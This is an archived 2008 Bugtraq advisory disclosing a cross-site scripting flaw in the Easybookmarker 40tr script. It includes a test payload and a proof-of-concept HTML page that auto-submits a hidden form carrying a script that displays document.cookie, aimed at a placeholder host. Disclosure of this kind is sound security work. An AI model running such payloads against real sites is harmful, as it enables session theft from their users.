| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200807191222.m6JCMq9C016070@www5.securityfocus.com>
Date: Sat, 19 Jul 2008 06:22:52 -0600
From: irancrash@...il.com
To: bugtraq@...urityfocus.com
Subject: Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
----------------------------------------------------------------
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
----------------------------------------------------------------
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
----------------------------------------------------------------
Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
----------------------------------------------------------------
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://example/zomplog/ajaxp_backend.php"
method="POST" name="form">
<input type="hidden" name="rs" value=""  <script>alert(document.cookie)</script>">
</form>
</body>
</html>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
Powered by blists - more mailing lists